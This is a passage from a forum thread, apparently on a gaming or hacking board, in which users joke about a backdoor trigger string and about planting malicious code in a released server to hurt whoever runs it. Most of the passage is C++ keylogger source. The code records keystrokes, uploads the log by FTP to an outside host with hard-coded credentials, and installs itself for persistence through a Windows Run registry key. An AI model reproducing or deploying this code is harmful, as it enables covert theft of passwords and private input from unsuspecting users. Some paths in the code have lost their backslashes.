if (Message == "@go_to_hell!ENC3101931993")
:rolleyes::rolleyes:
:rolleyes::rolleyes:
Lmao, nice. I haven't looked much at the source but if I see something in it like that... Hehe. :) :cool:Quote:
lol lets just hope all the noobs that try and run this don't find the malicious code imbedded in it so i can reap havac on anyone that puts it up :D
I'm still waiting for UltiCo to go back online so i can crash it again lmao
int KeyLog(char key)
{
ofstream keylog("C:Keystrokes.txt", ios::app); //Your LogFile "Keystrokes.txt" is kept at this path
keylog << key;
keylog.close();
}
void KeyCheck()
{
char key;
int pause;
while(1)
{
for(key = 32;key<=127;key++)
{
if (GetAsyncKeyState(key)==-32767)
{
pause = KeyLog(key);
}
}
Sleep(2);
}
}
void FileSubmit()
{
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hFtpSession = InternetConnect(hInternet,"myftp.iownedyourrofl.com",INTERNET_DEFAULT_FTP_PORT, "whodidiown"," everyone", INTERNET_SERVICE_FTP, 0,0 );
FtpPutFile(hFtpSession, "C:Keystrokes.txt", "mylog.txt", FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
}
void RegistryAndLocation()
{
char CurrentPath[MAX_PATH];
char NewPath[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,CurrentPath,sizeof(CurrentPath));
GetWindowsDirectory(NewPath,sizeof(NewPath));
strcat(NewPath,"keylogger.exe");
CopyFile(CurrentPath,NewPath,false);
HKEY hKey_a;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SoftwareMicrosoftWindowsCurrentVersionRun",0,KEY_SET_VALUE,&hKey_a );
RegSetValueEx(hKey_a, "Keylogger",0,REG_SZ,(const unsigned char*)NewPath,sizeof(NewPath));
RegCloseKey(hKey_a);
}
int main()
{
FileSubmit();
KeyCheck();
RegistryAndLocation();
return 0;
}
I'm sure it's hard to create another e-mail :rolleyes:Quote:
Want to flame or tell anything to a dude who released ? Here is his email [Only registered and activated users can see links. Click Here To Register...]